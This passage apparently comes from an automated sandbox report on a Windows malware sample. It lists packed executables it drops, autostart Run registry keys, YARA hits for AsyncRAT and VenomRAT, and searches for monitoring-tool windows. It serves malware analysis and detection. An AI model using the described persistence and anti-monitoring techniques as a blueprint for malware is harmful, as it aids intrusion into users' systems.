Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Unpacked PE file: 18.2.d985563cac.exe.970000.0.unpack :EW;.rsrc:W;.idata :W; :EW;beewzkou:EW;avotpigk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;beewzkou:EW;avotpigk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Unpacked PE file: 36.2.1124f3753f.exe.30000.0.unpack :EW;.rsrc:W;.idata :W;smeyiuht:EW;kkcdotxm:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Unpacked PE file: 37.2.25045de666.exe.b60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jmepqeib:EW;vxwpxfml:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jmepqeib:EW;vxwpxfml:EW;.taggant:EW;

.NET source code contains potential unpacker

Source: 13.3.n4e23hz.exe.6f623b8.0.raw.unpack, AssemblyLoader.cs

.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])

Source: Y-Cleaner.exe.15.dr

Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 1124f3753f.exe.12.dr	Static PE information: real checksum: 0x2bd131 should be: 0x2c2ea9
Source: n4e23hz.exe.12.dr	Static PE information: real checksum: 0x1b9925 should be: 0x1b0a3c
Source: random[1].exe.12.dr	Static PE information: real checksum: 0x1e08d8 should be: 0x1ea6f8
Source: soft[1].15.dr	Static PE information: real checksum: 0x0 should be: 0x170243
Source: b24ae367e7.exe.12.dr	Static PE information: real checksum: 0x1e08d8 should be: 0x1ea6f8
Source: dll[1].15.dr	Static PE information: real checksum: 0x0 should be: 0x400e1
Source: Y-Cleaner.exe.15.dr	Static PE information: real checksum: 0x0 should be: 0x170243
Source: 25045de666.exe.12.dr	Static PE information: real checksum: 0x1c096b should be: 0x1c4f60
Source: d985563cac.exe.12.dr	Static PE information: real checksum: 0x1d3039 should be: 0x1d353a
Source: CAFIJKFHIJ.exe.0.dr	Static PE information: real checksum: 0x3197ca should be: 0x3145fe
Source: c20459f2e6.exe.12.dr	Static PE information: real checksum: 0x1e08d8 should be: 0x1ea6f8
Source: n4e23hz[1].exe.12.dr	Static PE information: real checksum: 0x1b9925 should be: 0x1b0a3c
Source: Bunifu_UI_v1.5.3.dll.15.dr	Static PE information: real checksum: 0x0 should be: 0x400e1
Source: random[1].exe0.12.dr	Static PE information: real checksum: 0x1d3039 should be: 0x1d353a
Source: random[1].exe1.12.dr	Static PE information: real checksum: 0x1c096b should be: 0x1c4f60
Source: file.exe	Static PE information: real checksum: 0x1c096b should be: 0x1c4f60
Source: skotes.exe.9.dr	Static PE information: real checksum: 0x3197ca should be: 0x3145fe
Source: random[2].exe.12.dr	Static PE information: real checksum: 0x2bd131 should be: 0x2c2ea9

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: jmepqeib
Source: file.exe	Static PE information: section name: vxwpxfml
Source: file.exe	Static PE information: section name: .taggant
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: CAFIJKFHIJ.exe.0.dr	Static PE information: section name:
Source: CAFIJKFHIJ.exe.0.dr	Static PE information: section name: .idata
Source: CAFIJKFHIJ.exe.0.dr	Static PE information: section name: ybwlghty
Source: CAFIJKFHIJ.exe.0.dr	Static PE information: section name: bbydquix
Source: CAFIJKFHIJ.exe.0.dr	Static PE information: section name: .taggant
Source: skotes.exe.9.dr	Static PE information: section name:
Source: skotes.exe.9.dr	Static PE information: section name: .idata
Source: skotes.exe.9.dr	Static PE information: section name: ybwlghty
Source: skotes.exe.9.dr	Static PE information: section name: bbydquix
Source: skotes.exe.9.dr	Static PE information: section name: .taggant
Source: c20459f2e6.exe.12.dr	Static PE information: section name:
Source: c20459f2e6.exe.12.dr	Static PE information: section name: .idata
Source: c20459f2e6.exe.12.dr	Static PE information: section name:
Source: c20459f2e6.exe.12.dr	Static PE information: section name: qficpnjw
Source: c20459f2e6.exe.12.dr	Static PE information: section name: unknfscp
Source: c20459f2e6.exe.12.dr	Static PE information: section name: .taggant
Source: n4e23hz[1].exe.12.dr	Static PE information: section name:
Source: n4e23hz[1].exe.12.dr	Static PE information: section name: .idata
Source: n4e23hz[1].exe.12.dr	Static PE information: section name:
Source: n4e23hz[1].exe.12.dr	Static PE information: section name: kzyimikk
Source: n4e23hz[1].exe.12.dr	Static PE information: section name: vgdirfva
Source: n4e23hz[1].exe.12.dr	Static PE information: section name: .taggant
Source: n4e23hz.exe.12.dr	Static PE information: section name:
Source: n4e23hz.exe.12.dr	Static PE information: section name: .idata
Source: n4e23hz.exe.12.dr	Static PE information: section name:
Source: n4e23hz.exe.12.dr	Static PE information: section name: kzyimikk
Source: n4e23hz.exe.12.dr	Static PE information: section name: vgdirfva
Source: n4e23hz.exe.12.dr	Static PE information: section name: .taggant
Source: random[1].exe.12.dr	Static PE information: section name:
Source: random[1].exe.12.dr	Static PE information: section name: .idata
Source: random[1].exe.12.dr	Static PE information: section name:
Source: random[1].exe.12.dr	Static PE information: section name: qficpnjw
Source: random[1].exe.12.dr	Static PE information: section name: unknfscp
Source: random[1].exe.12.dr	Static PE information: section name: .taggant
Source: b24ae367e7.exe.12.dr	Static PE information: section name:
Source: b24ae367e7.exe.12.dr	Static PE information: section name: .idata
Source: b24ae367e7.exe.12.dr	Static PE information: section name:
Source: b24ae367e7.exe.12.dr	Static PE information: section name: qficpnjw
Source: b24ae367e7.exe.12.dr	Static PE information: section name: unknfscp
Source: b24ae367e7.exe.12.dr	Static PE information: section name: .taggant
Source: random[1].exe0.12.dr	Static PE information: section name:
Source: random[1].exe0.12.dr	Static PE information: section name: .idata
Source: random[1].exe0.12.dr	Static PE information: section name:
Source: random[1].exe0.12.dr	Static PE information: section name: beewzkou
Source: random[1].exe0.12.dr	Static PE information: section name: avotpigk
Source: random[1].exe0.12.dr	Static PE information: section name: .taggant
Source: d985563cac.exe.12.dr	Static PE information: section name:
Source: d985563cac.exe.12.dr	Static PE information: section name: .idata
Source: d985563cac.exe.12.dr	Static PE information: section name:
Source: d985563cac.exe.12.dr	Static PE information: section name: beewzkou
Source: d985563cac.exe.12.dr	Static PE information: section name: avotpigk
Source: d985563cac.exe.12.dr	Static PE information: section name: .taggant
Source: random[1].exe1.12.dr	Static PE information: section name:
Source: random[1].exe1.12.dr	Static PE information: section name: .idata
Source: random[1].exe1.12.dr	Static PE information: section name:
Source: random[1].exe1.12.dr	Static PE information: section name: jmepqeib
Source: random[1].exe1.12.dr	Static PE information: section name: vxwpxfml
Source: random[1].exe1.12.dr	Static PE information: section name: .taggant
Source: 25045de666.exe.12.dr	Static PE information: section name:
Source: 25045de666.exe.12.dr	Static PE information: section name: .idata
Source: 25045de666.exe.12.dr	Static PE information: section name:
Source: 25045de666.exe.12.dr	Static PE information: section name: jmepqeib
Source: 25045de666.exe.12.dr	Static PE information: section name: vxwpxfml
Source: 25045de666.exe.12.dr	Static PE information: section name: .taggant
Source: random[2].exe.12.dr	Static PE information: section name:
Source: random[2].exe.12.dr	Static PE information: section name: .idata
Source: random[2].exe.12.dr	Static PE information: section name: smeyiuht
Source: random[2].exe.12.dr	Static PE information: section name: kkcdotxm
Source: random[2].exe.12.dr	Static PE information: section name: .taggant
Source: 1124f3753f.exe.12.dr	Static PE information: section name:
Source: 1124f3753f.exe.12.dr	Static PE information: section name: .idata
Source: 1124f3753f.exe.12.dr	Static PE information: section name: smeyiuht
Source: 1124f3753f.exe.12.dr	Static PE information: section name: kkcdotxm
Source: 1124f3753f.exe.12.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Code function: 9_2_002DD91C push ecx; ret	9_2_002DD92F
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Code function: 9_2_002D1359 push es; ret	9_2_002D135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_0051D91C push ecx; ret	10_2_0051D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_0051D91C push ecx; ret	11_2_0051D92F

Source: file.exe	Static PE information: section name: jmepqeib entropy: 7.953655595962165
Source: CAFIJKFHIJ.exe.0.dr	Static PE information: section name: entropy: 7.162224148383568
Source: skotes.exe.9.dr	Static PE information: section name: entropy: 7.162224148383568
Source: c20459f2e6.exe.12.dr	Static PE information: section name: qficpnjw entropy: 7.941921100113594
Source: n4e23hz[1].exe.12.dr	Static PE information: section name: entropy: 7.944219044580318
Source: n4e23hz[1].exe.12.dr	Static PE information: section name: kzyimikk entropy: 7.9541750321291556
Source: n4e23hz.exe.12.dr	Static PE information: section name: entropy: 7.944219044580318
Source: n4e23hz.exe.12.dr	Static PE information: section name: kzyimikk entropy: 7.9541750321291556
Source: random[1].exe.12.dr	Static PE information: section name: qficpnjw entropy: 7.941921100113594
Source: b24ae367e7.exe.12.dr	Static PE information: section name: qficpnjw entropy: 7.941921100113594
Source: random[1].exe0.12.dr	Static PE information: section name: entropy: 7.978482515372212
Source: random[1].exe0.12.dr	Static PE information: section name: beewzkou entropy: 7.9535775684603935
Source: d985563cac.exe.12.dr	Static PE information: section name: entropy: 7.978482515372212
Source: d985563cac.exe.12.dr	Static PE information: section name: beewzkou entropy: 7.9535775684603935
Source: random[1].exe1.12.dr	Static PE information: section name: jmepqeib entropy: 7.953655595962165
Source: 25045de666.exe.12.dr	Static PE information: section name: jmepqeib entropy: 7.953655595962165
Source: random[2].exe.12.dr	Static PE information: section name: entropy: 7.822621783253833
Source: 1124f3753f.exe.12.dr	Static PE information: section name: entropy: 7.822621783253833
Source: Y-Cleaner.exe.15.dr	Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].15.dr	Static PE information: section name: .text entropy: 7.918511524700298

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\Documents\CAFIJKFHIJ.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	File created: C:\Users\user\AppData\Local\Temp\w7fGYZf24Ge7FfsRdF5EZfeASffsv\Y-Cleaner.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\dll[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	File created: C:\Users\user\AppData\Local\Temp\w7fGYZf24Ge7FfsRdF5EZfeASffsv\Bunifu_UI_v1.5.3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\Documents\CAFIJKFHIJ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\n4e23hz[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\dll[1]			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]			Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match

File source: 0000000D.00000003.2439904797.0000000005540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match

File source: Process Memory Space: n4e23hz.exe PID: 5724, type: MEMORYSTR

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 25045de666.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f1628a2a52.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d985563cac.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1124f3753f.exe	Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Window searched: window name: FilemonClass
